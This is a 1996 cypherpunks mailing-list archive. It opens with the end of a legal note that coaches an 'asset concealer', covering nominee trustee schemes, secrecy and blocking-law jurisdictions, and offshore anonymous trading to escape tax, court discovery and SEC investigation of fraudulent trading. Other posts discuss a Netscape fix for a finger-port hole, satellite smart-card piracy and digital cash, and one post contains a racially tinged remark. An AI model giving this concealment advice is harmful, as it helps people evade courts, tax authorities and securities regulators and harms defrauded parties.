neighboring trust company and notify one of the managers of the 
document deposit.  The manager of the neighboring trust company would 
select a nominee at random and instruct him to assume the duties 
entailed by the documents in the drop box.  In this way, even if 
traced to the original trustee the assets are now managed and 
assumably have been transferred by an entirely different trustee who 
is unknown to the first.  In the event A is released, he need only 
accompany the original trustee to the neighboring trust company to 
reclaim his assets.

Those countries which have statutes that U.S. courts have recognized 
as criminalizing disclosures tend to represent the most stringent 
tested blocking law examples.  These include Mexico, (Securities & 
Exch. Comm'n v. Minas de Artemisa, S.A., 150 F.2d 215, 218 (9th Cir. 
1945) and Panama, In re Chase Manhattan Bank, 297 F.2d 611, 612-13 (2d 
Cir. 1962).  After 1962, most courts refused to take judicial notice 
of the legality of disclosure in the foreign jurisdiction as it is 
currently considered irrelevant to the proceedings.

While many of the statutes enacted to counter aggressive United States 
discovery practices are based on the increasing anti-trust litigation 
in the 1970's, anti-trust law is beyond the scope of this note.  For a 
detailed treatment See e.g., I E. Nerep, Extraterritorial Control of 
Competition Under International Law 54-162 (1983).

The most important distinction in the appellate cases which have 
denied motions to compel discovery of foreign documents in the face of 
the foreign states criminalization of such disclosure, e.g., Ings v. 
Ferguson, 282 F.2d 149 (2d Cir. 1960) First Nat'l City Bank v. IRS, 
271 F.2d 616 (2d Cir. 1959) is that in both of these instances the 
entities holding the documents or discovery information were not 
themselves were not parties to the litigation.  See, e.g., Ings at 152 
(citing fact that custodian of records was not a party to the 
litigation as a prominent factor in its reasoning).  The astute asset 
concealer will not use his concealing bank to, e.g., trade securities 
illegally, and thus involve the concealing bank in the litigation.  
Still, it should be noted that the existence of an agency relationship 
provides an easy out for courts determined to compel discovery and the 
easiest way to assure that ones concealing institution is not named in 
a suit is to conceal the identity of the institution in the first 
place.

While jurisdictions which have active blocking statutes requiring 
governmental authority for a financial institution to release 
depositor information or documents are probably safest, courts at one 
time held that compelling a defendant depositor to actually instruct a 
bank to disclose his financial records violates his fifth amendment 
rights.  See In re Grand Jury Proceedings, 814 F.2d 791 (1st Cir. 
1987).  Fifth amendment rights will be discussed more fully below.  
Generally speaking, the asset concealer should avoid relying on the 
fifth amendment absent extraordinary circumstances.  For a full and 
detailed treatment of the fifth amendment non-applicability in cases 
involving judicially compelled document production, See Gordon Hwang, 
Note: Fisher v. United States: Compelled Waiver of Foreign Bank 
Secrecy and the Privilege Against Self-Incrimination, 56 Fordham L. 
Rev. 453 (1987)(Concluding that "the act of producing a consent 
directive... does not violate a witness' fifth amendment privilege 
against self-incrimination").

     Are High Profile Offshore Centers to be Avoided?

Further considerations for the U.S. asset concealer relate to the 
Cayman Islands and like jurisdictions.  For some time American 
citizens traveling frequently to the Cayman Islands have experienced 
increased law enforcement and tax scrutiny.  While I won't speculate 
as to the existence of a "black list," the glorious war on drugs has 
assured that The Cayman Islands and her visitors have, on occasion, 
attracted more law enforcement attention than the prudent asset 
concealer would want to endure.

In addition, both the Bahamas and the Cayman Islands have signed 
Mutual Legal Assistance Treaties ("MLATS") with the United States.  
Though the Bahamian and Cayman MLATs both have important restrictions 
on information relating to tax matters, the Bahamian treaty, requires 
assistance in tax matters where the "offense" involves narcotics, 
theft, violence, or dual crimes.  The Cayman MLAT excludes tax and 
currency offenses not relating to another criminal matter.

[...]

An excellent source for current high profile banking secrecy 
jurisdictions can be the periodic study by the Subcommittee on 
Investigations of the Senate Committee on Governmental Affairs, "Use 
of Offshore Banks and Companies."

     The Goals of the Asset Concealer and Selection of Jurisdiction

       Tax Cases

The reason for secrecy is terribly important in deciding jurisdiction.  
Of course, most litigation on the subject is with reference to 
taxation actions.  Jurisdictions with favorable laws for the "tax 
problem" depositor have traditionally included Switzerland, the 
Bahamas, the Cayman Islands, Bahrain, and Hong Kong.  See Generally 
Crinion, Information Gathering on Tax Evasion in Tax Haven Countries, 
20 Int'l Law. 1209 (1986)(analysis of law and practice of obtaining 
evidence from abroad in IRS investigations).  Switzerland, however, 
has leaned away from providing shelter to U.S. depositors accused of 
tax evasion.  While in practice Switzerland has been reluctant to 
disclose the information of depositors engaged in tax litigation with 
the United States and other nations, pressure from the U.S. has moved 
Switzerland, grudgingly, to comply in many of these cases.  Banking 
secrecy in Switzerland remains more stringent in other areas, but her 
deference to the United States is disturbing.

       Securities Issues

Securities litigation is probably the next most frequent category of 
case involving international discovery and the compelled discovery of 
documents.  Blocking and secrecy laws of those countries with robust 
legislation will protect the asset concealer concerned with this area.  
Many countries which have signed agreements with the United States, 
notorious for its excessively energetic securities regulation, still 
have found ways to avoid complete compliance through treaty loopholes.  
Of particular note, with my previously expressed reservations about 
newly emerging agreements, is the Swiss accord, The United States-
Swiss Treaty on Mutual Assistance in Criminal Matters 27 U.S.T. 2019, 
T.I.A.S. No. 8302 (1977) which is fairly typical of such agreements.  
Because the Swiss agreement requires that the alleged acts which are 
the subject of the litigation spurring discovery be illegal in 
Switzerland as well as the prosecuting nation, and because some U.S. 
and other securities violations do not expressly "contravene" Swiss 
law, the Swiss treaty is, in extremely limited circumstances, an open 
tunnel for non-disclosure.  See Generally, Brodeur supra.

Offshore entities are particularly useful in active trading for the 
asset concealer anticipating securities regulation problems.  Problems 
with the SEC's Enforcement of U.S. Securities Laws in Cases Involving 
Suspicious Trades Originating from Abroad, H.R. Rep. No. 1065, 100th 
Cong., 2d Sess. 2-6 (1988).  The sheer volume of international trading 
on the large U.S. markets provides an excellent opportunity for 
securities traders to become a "drop in the bucket."  Reported 
purchases of stock in the United States by foreign entities were $41.8 
billion as early as 1982.  Swiss banks alone may account for as much 
as 20% of the trading volume on the New York Stock Exchange.  Siegel, 
United States Insider Trading Prohibition in Conflict with Swiss Bank 
Secrecy, 4 J. Comp. Corp. L. & Sec. Reg. 353, 357 (1983).  Because the 
enforcement of securities laws within the United States has been so 
dependent on disclosure and the open identity of the traders, many 
have used this "weak link" to avoid unwanted attention by trading from 
anonymous or nearly anonymous accounts abroad.

[...]

Some jurisdictions continue to provide a measure of safety against 
outside investigation of fraudulent and illicit trading through 
blocking and privacy statutes, Liechtenstein, Monaco, Luxembourg, and 
the Cayman Islands are the best examples. See Generally, Rochelle G. 
Kauffman, Note, Secrecy and Blocking Laws: A Growing Problem as the 
Internationalization of Securities Markets Continues, 18 Vand. J. 
Transnat'l L. 809, 819-26 (1985)(discussing countries with blocking 
statutes and the effect  of these laws on the SEC); Yvonne G. Grassie, 
Recent Development, Foreign Bank Secrecy and Disclosure Blocking Laws 
as a Barrier to SEC Policing of Transnational Securities Fraud, 65 
Wash. U. L.Q. 259 (1987)(discussing judicial and administrative 
efforts to deal with blocking statutes).

Occasionally, where suspicious trading originates from a country such 
as Panama, Luxembourg, or Liechtenstein with blocking or secrecy 
statutes and no bilateral agreements with the United States, the SEC 
takes no investigative action.  See Grassie. at 11 (statement of Mr. 
Mountjoy).  Where a bilateral agreement exists, the Commission is 
often reluctant to invoke less it "wear out its welcome" with the host 
country.  Id. at 12-13 (investigation into suspicious trading through 
Swiss banks in which conclusive indications that U.S. securities laws 
had been violated existed still resulted in no request information to 
the Swiss authorities).

Identifying foreign owners can be virtually impossible when ownership 
must be traced through bearer shares, such as those issued by 
Liechtenstein Anstalts,  or when ownership is held through accounts in 
jurisdictions with iron clad bank secrecy laws.  See, e.g., Ingo 
Walter, The Secret Money Market 185-237 (1990) (emphasizing use of 
secrecy jurisdictions as means of avoiding detection and enforcement); 
Marc C. Corrado, Comment, The Supreme Court's Impact on Swiss Banking 
Secrecy: Societe Nationale Industrielle Aerospatialle v. United States  
District Court, 37 Am. U. L. Rev. 827, 829-31 (1988)(reviewing Swiss 
domestic policy rationales for bank secrecy); Michael Getler, Europe's 
Ultimate Tax Haven, Wash. Post, Jan. 15, 1978, at H5; Liechtenstein; 
Coming Clean, The Economist, Apr. 26, 1980, at 59; Steve Lohr, Where 
the Money Washes Up, N.Y. Times, Mar. 29, 1992, at 27 (Magazine); John 
Wicks, A Tax Haven Where Companies Outnumber the Population, Fin. 
Times, Aug. 24, 1984, at 8.  To deal with the challenges posed by 
foreign ownership and trading, the U.S. Securities and Exchange 
Commission has negotiated an intricate web of treaties and memoranda 
of understanding.  See, e.g., Richard M. Phillips & Gilbert C. Miller, 
The Internationalization of Securities Fraud Enforcement in the 1990s, 
25 Rev. Sec. & Commodities Reg. 119 (1992).  Switzerland now often 
conditions permission to trade on U.S. securities markets with a 
waiver of secrecy.

[...]

(End of Segment 1 of Volume I)

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Sat, 30 Mar 1996 19:08:01 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Netscape 2.01 fixes server vulnerabilities by breaking the client...
In-Reply-To: <Pine.SUN.3.92.960329011606.6636A-100000@elaine19.Stanford.EDU>
Message-ID: <315C8FCB.2781@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:
> 
> Now I suppose they'll want me to fix all the pages where I do a finger
> with a gopher://host:79/0user Any chance this nonfix can be unfixed?
> 
> This nonfix was applied to the UNIX and Win32 versions; I haven't
> checked the other platforms.

It may be unpleasant, but it's a fact that there was a real security
hole here.  There is a well known buffer overrun bug in finger that a
lot of people inside firewalls haven't fixed.  Using gopher: URLs
in IMG tags it was possible to do nasty things.  We tried to err on
the side of permissivity, but finger was one port we just couldn't
allow.  Yes, it sucks.  So does someone reaching through your firewall
and running commands as root.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sat, 30 Mar 1996 17:43:18 +0800
To: cypherpunks@toad.com
Subject: Blind signatures
In-Reply-To: <199603290709.IAA28320@slld01.SLL.SE>
Message-ID: <Pine.HPP.3.91.960329173842.11891A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



Perry said:

> "How does blinding work"
...
> are fine things to talk about but


Yeah, how does it really work? Could you explain it in
'kitchen modular arithmetics' to us groupies?

Asgaard 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 29 Mar 1996 17:46:06 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: What backs up digital money?
In-Reply-To: <199603272304.PAA26037@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.960328151139.1406B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Mar 1996, Hal wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> From: tcmay@got.net (Timothy C. May)
> > At 1:46 PM 3/27/96, Scott Schryvers wrote:
> > >Question.
> > >If e-cash were backed by gold would that make it more reliable than say the
> > >dollar?
> > 
> > This question, and much of the debate that appears here about digital money
> > in its many and confusing forms (e-cash, digicash, bitmarks, e$,
> > cypherfrancs, chaums, etc.), displays a "type error" in thinking about
> > digital money.
> > 
> > No form of digital money extant is an actual currency in the conventional
> > sense. Nor does this seem likely. Nor necessary. Nor useful. Nor important.
> > 
> > Rather, think in terms of _checks_ or _wire transfers_ and the like. An
> > order to transfer funds from one account or place of holding to another.
> 
> Tim is right when he goes on to say that digital money is not exactly
> like any of the traditional financial instruments.  However I think it is
> more like cash, and for that matter more like currency, than like other
> things.
> 
> Here are some of the ways it is like cash.  It is basically anonymous,
> with neither buyer nor seller able to learn the identity of the other,
> even with the help of the bank.

So are bearer bonds, stock warrants, coupons...

  It is untraceable; there is no way to
> know, given a piece of cash, under which transaction it was withdrawn
> from the bank.

Ditto above.

> It is a bearer instrument; anyone can hold it, and
> whomever presents it gets the value (that is, it is not "made out" to a
> certain individual).

There are any number of bearer instruments that are not "currency."

> A piece of dcash is an asset, a claim on the
> bank.

Not technically true unless it is specifically structured this way.  It's 
more of a bearer draft.  Because digital cash is a token used by the bank 
to represent currency, which is backed by a government, digital cash, in 
it's current form, is a second tier bearer instrument.

> When dcash is withdrawn, the bank must debit (reduce) the
> customer's account immediately.

This is so of checks too, but the processing time gets in the way.

> Likewise, when it is deposited, the
> depositor's account gets credited.

See above.

> Between those times the net amount
> of money in bank accounts was reduced, by exactly the amount of
> circulating dcash.

Ditto uncashed checks.

> When the money supply is counted, circulating dcash
> will need to be included with traditional currencies like cash and
> coins (I think that is M1), since it is not counted in the bank
> accounts.

Actually, it looks more like circulating dcash is a subset of outstanding 
obligations.  Same as, e.g., letters of credit.

> The difference with checks and wire transfers is that in those cases
> there is a direct transfer of assets from one account to another.  These
> are not bearer instruments; in fact wire transfers aren't really
> financial instruments at all, and do not carry value.  There is normally
> no anonymity or untraceability either, with these kinds of transactions.
> So I see them as being very different from dcash.

Making a check payable to "cash" makes it, for practical purposes, a bearer 
instrument.

> The best analogy to dcash is the private currency which was issued by
> banks and other financial institutions prior to about 1850 (in the US).
> Until that time the US government did not issue paper money, it was all
> private.  A bank would issue bank notes, which would circulate in its
> local area as money.  They were backed up by "real money", specie,
> metallic coins, which the bank kept in its vaults.  The digital cash
> issued by Mark Twain bank is in many ways a throwback to these old bank
> notes.

But instead of backing in gold, or some tangible asset, dcash is still 
ultimately backed by the full faith and credit of the government who's 
currency the dcash is denominated in.

> There are differences, of course.  A lot of attention is focussed on the
> non-transferrability, the fact that you have to deposit the cash at the
> bank after each transaction.  Some people say that this means that the
> cash doesn't circulate, hence is not a currency, hence must be more like
> checks, etc.  But I disagree.  I view this aspect of dcash as superficial
> and unimportant.  First, it may not be technically necessary.  Some cash
> systems have been proposed which allow for transferrability.  But second,
> even if it is necessary to exchange cash after each transaction, that can
> be done completely automatically.  In fact, the agency which does so
> doesn't even have to be the bank, as far as the financial aspects go.
> The exchange has no financial impact on the bank's accounting procedures.
> And it can be completely automated for users.  They don't even have to be
> aware of it.  Their software can turn in received dcash at the bank for
> fresh banknotes, anonymously and automatically.
> 
> So I view dcash as a circulating currency, where the act of transfer in
> some implementations requires some technical assistance from an agent
> of the bank able to make digital signatures on its behalf.  It is more
> than simply a mechanism for transferring funds from one account to
> another (unless you think of government currency in those terms).  I
> view it as possessing real value, as being a genuine asset in the same
> sense as other forms of cash.

I still think the essential issue here is the manner in which the ecash 
is based.  If it is based on government currency, the U.S. dollar, then 
it is still just a second tier bearer instrument.

I think that the diet coke backed cash I tried to promote back when was 
closer to a "currency" than d/ecash issued by a bank and drawable on 
government currency.  (Maybe this is why no one was interested?)

Real solid ecash, and the kind of cash I would like to see out there, 
would be limited to a non-dilutable one time issuance and backed in some 
precious commodity held on reserve.  A closed-ended share of a stock of 
gold, for instance.  That would require no intermediation of a "currency" 
based on the full faith and credit of an issuing sovereign.

Private currencies are not private currencies at all if they have to be 
linked to a government issued denomination.

> Hal
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6
> 
> iQBVAwUBMVnJehnMLJtOy9MBAQGoxwIAiFRtBo215dXzlRWR1drH8dQR63zKkPoQ
> 5EDk85YM8fxIaDg/cYrGEzl+bDlF2qOJisjrCl9XkTJEBrifHavrEQ==
> =792N
> -----END PGP SIGNATURE-----
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Sat, 30 Mar 1996 17:43:47 +0800
To: cypherpunks@toad.com
Subject: Foreign language brouhaha
Message-ID: <199603300058.RAA10019@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


As is par for the course, Tim May's comments are apposite and on the mark.

As for the fellow whose neighbor was blasting "Yoruba 'music'", he certainly
has my sympathy, but amazingly, he seems to feel that that this is something
that we should  all put up with/enjoy to encourage diversity.

Perhaps it's time to revive that "racist" "thang" called decent people and
their sensibilities.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tim May)
Date: Sat, 30 Mar 1996 15:04:15 +0800
To: cypherpunks@toad.com
Subject: Electronic locksmiths are watching you (Belgium's ban on PGP)
Message-ID: <199603300202.SAA18349@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain



This seems like an interesting glimpse into the future of crypto banning
around the world. France's ban on unapproved crypto has been
well-publicized, but I hadn't heard until this message that Belgium has
joined in.

The reference to Belgium's wiretap law and "But little-known sections of
the law state that  all cryptograhic systems aimed at protecting privacy
must not block these wiretaps" suggests that we ought to look _very_
closely at our own Wiretap Act (aka Digital Telephony) for similar
language.

(Many of us thought at the time DT was being debated--both weeks of the
public debate--and then when it was passed that things would get real
interesting when the "central office wiretappability" vanished with
end-to-end encryption. Louis Freeh even said as much, that the issue of
end-to-end encryption would have to be addressed once the Digital
Telephony Act was passed.)

With Internet phone systems (various) and easy integration of PGP, a la
PGPhone, even the Little Italy businessmen may start to use encryption.
Likewise, there are currently no laws (that I am aware of) forbidding
encrypted telephones--indeed, the Clipper phones were just this, and they
were available for general purchase. Granted, the gubment knew the
algorithm and there _may_ (emphasis on the "may") have been backdoors
allowing easy wiretapping. But there was no key escrow per se.

So, when the $500 M to make digital switches "compliant" with DT is spent
(and bear in mind it hasn't been allocated yet by Congress, to the best of
my knowledge), and yet some future John Gotti is untappable because he's
using Eric Blossom's crypto phone, what then?

Anyway, here's the item about Belgium's law:


> From: Jerome Thorel <thorel@imaginet.fr>
> Newsgroups: talk.politics.crypto,alt.privacy,alt.security.pgp
> Subject: Electronic locksmiths are watching you (Belgium's ban on PGP)
> Date: 26 Mar 1996 00:08:44 GMT
...
> 
> Some hot news about Belgium:
> 
> After reports in two Belgian newspapers (De Standaart and Le Soir), it 
> turns out that Belgium had passed a law in late 1994 that formerly bans 
> "non approved" encryption systems. This means that France is not alone 
> to block domestic use and distribution of strong encryption systems, 
> since a December 1990 law which came into effect in France in early 
> 1993.
> 
> In its March 13 edition, French-speaking newspaper Le Soir ran a whole 
> page survey about the fact that a 21 December, 1994 law oblige the 
> telecom state-own company Belgacom to make any wiretap possible for law 
> enforcement purposes. But little-known sections of the law state that 
> all cryptograhic systems aimed at protecting privacy must not block 
> these wiretaps. Crypto systems have to be "agreed" by the government's 
> Institut Belge des postes et telecommunications (IBPT). The author of Le 
> Soir's article, Alain Guillaume, speculates that this "agreement" means 
> that encryption keys must be kept by IBPT.
> 
> "The idea is neither new nor surprising," Guillaume writes. "To stop 
> criminals from hiding. (...) But does anyone believe that mafia gangs, 
> crooks or terrorists will let their keys to IBPT's hands?"
> 
> =+= France enthrone key escrow =+=
> 
> At the same time, France is keen to give up his isolationist position. 
> French telecom Minister François Fillon has prepared a kind of Telco Act 
> "à la francaise" -- new regulations to prepare the end of France Telecom 
> monopoly in 1998 -- in which encryption would be freed to allow the 
> emergence of "efficient electronic commerce". Under the new rules, 
> special "authorization" will no more be needed to use PGP-like tools, 
> but every user would be obliged to let their keys in custody in 
> so-called "trusted third parties" (TTPs) agencies, a kind of "electronic 
> locksmith", or notary, alternative. The option smells quite the same as 
> Sen. Leahy bill (Encrypted Communications Privacy Act of 1996, archived 
> at http://www.epic.org/crypto/legislation/s1587.html), in which escrow 
> agents would hold keys to help the police, with a court order, to 
> intercept communications.
> 
> In France no one knows who will play the role of "key escrow agent", but 
> sources said it may be some independent agencies. Independent? The 
> governement will anyway have to approve them, and Mr Fillon said France 
> will enthrone its first TTP "before the end of this year". 
> 
> This bulletin and the British weekly Nature discovered last November 
> that a group of 18 European nations were soon to adopt this alternative 
> (http://www.freenix.fr/netizen/chiffre /nature-eurottp.html). The UK and 
> Germany have declared themselves ready for such an alternative (see 
> lambda bulletin 1.06). Belgium, with its new iron bullet, would be keen 
> to follow.
> ------------------------------
> Jerome Thorel. Free-lance reporter, Paris
> netizen's lambda bulletin (issue 2.05)
> http://www.freenix.fr/netizen/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 30 Mar 1996 16:06:58 +0800
To: kooltek@iol.ie (Hack Watch News)
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
In-Reply-To: <199603292053.UAA18333@GPO.iol.ie>
Message-ID: <199603300210.SAA09465@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


kooltek@iol.ie (Hack Watch News) writes:

 > The DSS smart card has been reverse-engineered for at least
 > six months now and pirate devices are in the market. The
 > encryption used on those systems is good but it does not
 > stand up to a well financed attack.

This is indeed good news.  I haven't followed the satellite wars
for a while, and although I was aware that the earlier European
system had been broken, I didn't know that the one used by the
DSS folks had by now also met a similar fate.

This is interesting, since the technology to do unbreakable
encryption and authorization certainly exists.  Perhaps the DSS
folks should have brought in a few Cypherpunks as quality control
consultants. :)

 > Using DES to encrypt the audio on the fly is an old
 > technique and was used in the VideoCipher II system. Most of
 > the more recent systems use a PRNBSG EXORed with the digital
 > audio data stream.

Again, it's been a while since I looked at the industry, but I
was under the impression that the VideoCipher II was still used
by Satellite dish owners to receive CNN, HBO, SHO, TMC, and the
rest of the ordinary analog pay cable channels.

Has everyone now been forced to upgrade to something "new and
improved?"

 > The problem of piracy will still exist on digital systems.
 > The DSS system is a completely digital system and it too is
 > hacked.

Digital systems eliminate the main drawback of analog ones for
using cryptography, namely that there is no way to strongly
encrypt the video and ship it out using the same modulation
technique which originally encoded it.

Once you have both audio and video streams in digital form,
having ones encryption "hacked" is more a function of
cluelessness on the part of those engineering the encryption and
authentication mechanism than some latent vulnerability on the
part of the technology.

I'm really surprised that DSS got hacked, given that the hacking
of the European digital system was well known while DSS was being
constructed.  Sounds like a very slow learning curve somewhere in
the engineering process.

 > Admittedly some of the elements of security in the DSS are
 > good, most can be rendered void by hackers. The problem for
 > DSS is that the smart card they used is not secure enough.
 > It was a Motorola 6805 type. What appears to be the pattern
 > with the hacks on more recent smart card systems is an
 > inversion of the original pattern on the simple analogue
 > systems. The original pattern was that some hobbyists would
 > figure out how to hack the system and then the hack would be
 > commercialised. With the smart card hacks - the pattern is
 > inverted so that it becomes a trickle down pattern. The
 > professional hackers reverse and emulate the smart card and
 > then the code is sometimes hacked from the emulator card and
 > then distributed among hobbyists.

In a well engineered smart card system for authorizing individual
viewers of a digital audio/video stream, each card contains a
unique serial number and a random cryptographic key stored during
the manufacturing process in a manner which cannot be obtained
even by destructive reverse engineering of a particular card.

The originating system then uses this information to embed
messages in the transmitted data stream permitting individual
cards to decrypt and recover the random and frequently changing
session key with which the channel bitstream has been strongly
encrypted.

If such a system has been properly implemented, all the
specifications for it should be able to be published without
compromising it.  Emulators for the software used in the cards
shouldn't be a problem as long as serial#/key pairs for specific
cards are not disclosed.

 > The most dangerous thing in all this is that the smart
 > cards that have been hacked in Pay TV systems throughout
 > the world are also used in other applications. The expertise
 > and the knowledge of reversing smart cards is now more
 > common in the Pay TV piracy business. There is always the
 > possibility that these skills could be applied elsewhere.

Perhaps in the private sector, where snake oil abounds.  I
suspect military types do things a bit more cleverly than the
prior scenario implies.

BTW - what is the legal status of hacking DSS?  It's not like
cable, where you are tapping into a municipal service illegally.
You own the dish, the decoder, and the photons with which the
satellite is irradiating your back yard.  Can the government
really regulate how you choose to process photons found on your
own private property with equipment you own?

Have there been any test cases?

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 30 Mar 1996 20:21:07 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Netscape 2.01 fixes server vulnerabilities by breaking the client...
In-Reply-To: <315C8FCB.2781@netscape.com>
Message-ID: <Pine.SUN.3.92.960329181511.15466A-100000@elaine17.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Mar 1996, Tom Weinstein wrote:

> It may be unpleasant, but it's a fact that there was a real security
> hole here.  There is a well known buffer overrun bug in finger that a
> lot of people inside firewalls haven't fixed.  Using gopher: URLs
> in IMG tags it was possible to do nasty things.  We tried to err on
> the side of permissivity, but finger was one port we just couldn't
> allow.  Yes, it sucks.  So does someone reaching through your firewall
> and running commands as root.

How about limiting URLs on non-blessed ports to, say, 64 alphanumeric
characters? I'm sure the documentation writers and technical support
folks would hate you, but it should address these concerns.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brookfld@netcom.com (Brookfield Economics Institute (U.S.A.) Limited)
Date: Fri, 29 Mar 1996 18:48:14 +0800
To: cypherpunks@toad.com
Subject: suggestions for starting an e-bank
Message-ID: <199603282331.PAA22199@mail.instanet.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

If I were going to start an e-bank, what would you suggest?

1. What type of e-cash system?
2. What services to offer?
3. Where would I get information?
4. Where is there a need in the marketplace?

A friend of mine has the means and desire to do this, and he wanted me to
ask and then forward the answers to him.

Thank you in advance.

--Richard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 29 Mar 1996 18:53:28 +0800
Subject: No Subject
Message-ID: <199603291053.SAA12001@infinity.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Mar 1996, Mike Duvos wrote:

> tcmay@got.net (Timothy C. May) writes:
> 
>  > At 1:46 PM 3/27/96, Scott Schryvers wrote:
> 
>  >> Question. If e-cash were backed by gold would that make it
>  >> more reliable than say the dollar?
> 
> Not necessarily.  Historically, gold emerged as the primary
> currency metal because

[Excellent points about gold's practical use, good timing, and industrial 
value countered by the current lack of industrial value.]

> Basically, one can create monetary value for any commodity whose
> supply can be controlled, usually by the folks wishing to lend it
> value, by simply making a stable market in it, and having the
> reputation and power to control that market in perpetuity.
> 
> The best example of this is probably the diamond market.  Here we
> have a rare but intrinsically worthless material, the gem quality
> diamond, which has no useful industrial applications at all,
> since non-gem quality diamonds and substitutes, both synthetic
> and natural, are in abundance.

I was with you until this.  In fact diamonds are anything but rare.  
Their value is the result of the most exceptional marketing by DeBeers, 
and the very tight restrictions on supply.  I might note that the 
restrictions on supply are even somewhat tangential.  DeBeers has created 
one of the most historic, long standing and impressive market distortions 
anyone has ever seen.

Of course this only goes to further the argument (which I think you are 
adopting) that it is fairly simple to estlablish a commodity of "value" 
regardless of intrinsic worth)

> Gem quality diamonds are extremely valuable, because their supply
> is carefully controlled, and because of clever marketing designed
> to convince every male human in North America and most of Europe
> that shelling out two months salary for one is the unique and
> true symbol of everlasting love.

Even gem quality stones are relatively abundant believe it or not.

> The diamond industry has even made plans for the holographic
> fingerprinting of every diamond they release, should synthetic
> gem-quality diamonds ever hit the market, so that they may
> continue their control of the supply of their "currency", even in
> the face of a flood of absolutely identical "unsanctioned" gems.

Again, even absent the intrinsic value of the substance it seems that 
marketing and perception will dictate "effective value."

> I recall a very clever Science Fiction story I read a number of
> years ago in which aliens completely destroyed human civilization
> by manufacturing all the world's goods and services, and
> accepting payment only in cowpies, which were subject to an
> arbitrary and complicated grading system similar to that used by
> modern gemologists.  One day, the aliens simply left, and human
> civilization, consisting mostly by then of PhD Cowflopologists
> with expertise only in interpreting swirls on lumps of shit,
> promptly folded.

This is precisely the point, and why, while I agree with your comments 
about gold today, I think the most important issue is the long term 
solvency of a commodity.  As you have noted, anyone can make a substance 
worth something in the short term.  (Tulips)  The challenge, and the 
goal in my view, is to create a currency based on a backing which endures 
the long term, and the unthinkable (collapse of a major government or 
some such).

> Before I digress to far from your original question, let me state
> the point I am trying to make here.  If a entity, or group of
> entities, with reputation and power to make a market, decide to
> demoninate a currency using a rare commodity, it makes little
> difference whether the rare commodity is near-perfect crystals of
> carbon found only on land that they own, a vault filled with gold
> bars, exponentiated random numbers modulo the product of two
> large but closely guarded primes, or statistically unlikely
> swirls in wads of digested plant material dropping from the butt
> of a cow.
> 
> In all these cases, the important thing is not the commodity, but
> the entities guaranteeing the market, and the perception of their
> reputation and ability to support said currency in perpetuity.
> Absolute control over the supply of the commodity in question
> doesn't hurt either.

When the value of the intrinsic worth of a commodity in question does become 
apparent is in periods of transition, flux, disorder, or strife.  The 
security of a currency is going to be a major factor, especially 
immediately following introduction, to its popularity- except in unusual 
circumstances (tulips, market distortions, etc.)

> Indeed, US government backed e-cash would be a far more trusted
> and reliable currency than gold backed currency printed by
> DigiCash BV.

I'm not sure this is precisely true.  While gold itself might not be the 
best choice, the general principal that a commodity based currency is 
less secure or trustworthy than a government backed one (even a powerful 
and imposing government) is not one I'm prepared to endorse without 
reservation.

> One good inflation-resistant indicator of whether gold is a good
> value is the ratio between gold and silver prices.  Both of these
> metals are mined with similar difficulty, and have similar uses
> for backing currency and as coinage metals.  Historically, there
> have been times when gold and silver prices were approximately
> equal.
> 
> I have no doubt that if the unwashed masses were sold the notion
> that gold was the single reliable inflation-proof form of wealth
> they could own, and the holdings of international bankers were
> sold into the hands of millions of individual citizens, a
> controlled devaluation would follow, together with much chortling
> and uncorking of champagne, as gold and silver prices became
> nearly equal again.

I believe this correct.

> As long as people who count have vaults full of the stuff, and
> wish to carry it on their books as an expensive asset, it will of
> course continue to have its current inflated value, and nothing
> will be done to depress the market.  In that sense gold is a
> reliable asset, as long as most of the little people refrain from
> jumping on the bandwagon.

Just like diamonds.
Again, while the commodity itself (gold) may not be appropriate, I don't 
believe this ends the argument.
 
>  > No form of digital money extant is an actual currency in
>  > the conventional sense. Nor does this seem likely. Nor
>  > necessary. Nor useful. Nor important.
> 
